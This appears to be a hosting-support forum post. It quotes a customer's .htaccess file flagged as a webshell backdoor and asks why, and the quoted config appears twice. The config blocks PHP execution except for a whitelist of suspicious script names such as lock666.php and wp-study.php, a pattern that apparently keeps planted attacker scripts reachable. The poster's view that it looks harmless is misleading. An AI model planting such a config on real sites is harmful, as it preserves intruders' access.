Tweet
We've received reports from a customer that the .htacess files on their cPanel server is infected by SMW-INJ-19608-htaccess.bkdr.wshll-1 however the content dont appear malicious:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|wjsindex.php|lock666.p hp|f ont-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|x mlrpcs.php|container.php|entity.php|header.php|sty le.php|constant.php|access.php|locale.php|uninstal l.php|themes.php|wp-login.php|scindex.php|wp-load.php|admin.php|settings.php|lofter.php|wp-crons.php|activate.php|router.php|repeater.php|wp-scripts.php|wp-study.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|wjsindex.php|lock666.p hp|f ont-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|x mlrpcs.php|container.php|entity.php|header.php|sty le.php|constant.php|access.php|locale.php|uninstal l.php|themes.php|wp-login.php|scindex.php|wp-load.php|admin.php|settings.php|lofter.php|wp-crons.php|activate.php|router.php|repeater.php|wp-scripts.php|wp-study.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
Comment